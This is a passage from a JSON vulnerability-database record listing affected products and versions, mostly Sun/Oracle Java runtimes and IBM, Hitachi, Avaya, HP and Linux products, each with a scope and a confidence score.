"eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "sdk 1.4.2 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 28", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 27", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "linux enterprise software development kit sp2", "scope": "eq", "trust": 0.6, "vendor": "suse", "version": "11" }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "meeting exchange web conferencing server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "-6.0" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.5" }, { "model": "nonstop server h06.16.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "java sdk sr4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "nonstop server j06.09.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "lotus domino fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.6" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.5" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux enterprise server sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "nonstop server h06.18.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.15.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.22.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.35" }, { "model": "nonstop server j06.08.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.16", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.39" }, { "model": "nonstop server j6.0.14.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.22" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "interactive service manager web tier", "scope": "eq", "trust": 0.3, "vendor": "mercury", "version": "9.30" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.02" }, { "model": "java sdk sr4", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "nonstop server j06.07.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "aura system platform", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.17" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-50-10" }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "qradar security information and event manager 7.1mr2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli federated identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "nonstop server h06.15.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ims enterprise suite", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.5" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "interactive service manager web tier", "scope": "eq", "trust": 0.3, "vendor": "mercury", "version": "7.11" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "java sdk sr12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "nonstop server j06.13.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "tivoli system automation for integrated operations management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "meeting exchange streaming server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "-6.0" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.5" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.3" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "data studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "meeting exchange recording server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "-6.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "maximo asset management essentials", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.1" }, { "model": "nonstop server j06.15", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.20" }, { "model": "tivoli federated identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "optim performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "infosphere replication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "aura presence services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "qradar risk manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "nonstop server h06.21.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.13" }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "qradar security information and event manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.03" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.15" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere datapower xc10 appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.37" }, { "model": "nonstop server j06.06.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "data studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "nonstop server j06.06.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.17.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "rational appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "conferencing standard edition", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "nonstop server h06.17.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "linux enterprise java sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-50-09" }, { "model": "rational host on-demand", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.01" }, { "model": "rational team concert", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "service manager p2", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9.31.2004" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "java sdk sr13-fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "nonstop server h06.27", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.30" }, { "model": "nonstop server j06.14.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "java se sr16", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java se sr13", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.12" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "websphere partner gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "trio tview software", "scope": "eq", "trust": 0.3, "vendor": "schneider electric", "version": "3.27.0" }, { "model": "cms r15", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "nonstop server j06.08.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cms r16.3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "meeting exchange client registration server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "-6.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.11" }, { "model": "data studio", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "java se sr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "rational appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "lotus notes fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "nonstop server j06.04.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.11" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "filenet system monitor fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.5.03" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.5" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "quickfile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational appscan enterprise", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.7.0.1" }, { "model": "tivoli federated identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.11" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.2" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli federated identity manager business gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "tivoli application dependency discovery manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.5" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1" }, { "model": "java sdk sr13", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.13" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "qradar risk manager 7.1mr2 patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational performance tester", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.3" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "nonstop server h06.25", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "qradar security information and event manager 7.1mr2 patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "cosminexus server standard edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-04-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "nonstop server j06.07.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "linux enterprise server for vmware sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "tivoli federated identity manager business gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "nonstop server j06.08.04", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational automation framework", "scope": "eq", 